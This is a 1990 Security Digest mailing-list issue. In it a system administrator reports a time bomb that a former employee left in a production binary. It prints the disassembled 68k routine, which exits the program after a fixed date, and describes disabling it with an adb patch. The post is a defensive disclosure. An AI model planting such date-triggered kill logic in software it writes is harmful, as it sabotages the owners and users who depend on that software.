Date: Thu, 18 Jan 90 17:15:37 PST
Subject: Security Digest V2 #3

Security Digest Volume 2 Issue 3

subject(s):

            time bombs do exist

------------------------------------------------------------------------

Date: Sun, 14 Jan 90 13:01:12 PST
From: bcx@eeg.com (Bryan Costales)
Subject: time bombs do exist

Yes, time bombs in code do exist. The following fragment of code
was found in an important binary left by a former employee. The comments
are mine.

adb>_cktime,25?i
_cktime:
_cktime:    link    a6,#-8
            movl    #2427715C,d0   #  Wed Mar 22 02:11:40 1989 (in seconds)
            subl    _etime,d0      #  difference twixt now and then
            movl    d0,a6@(-4.)
            divsl   #15180,d0      #  divide by 24hrs worth of seconds
            addl    #118,d0        #  add back 280 days
            movl    d0,a6@(-8.)
            bgts    _cktime+46     #  normal run if positive
            jsr     _retm          #  exit if negative
_cktime+46  unlk    a6
            rts                    #  normal return
_etime             # set at runtime to today's date/time in seconds

We were not left with enough of the original source to regenerate a new
binary, but, by using adb, we patched the binary, changing the bgts
into a bras, thus disabling the exit. We are still sleuthing for backup
bombs, but have thus far found none.  I guess the moral here, is to run
something like the "file motel" and archive absolutely everything
forever.

------------------------------------------------------------------------

        End of Security Digest Volume 2 Issue 3
        **********************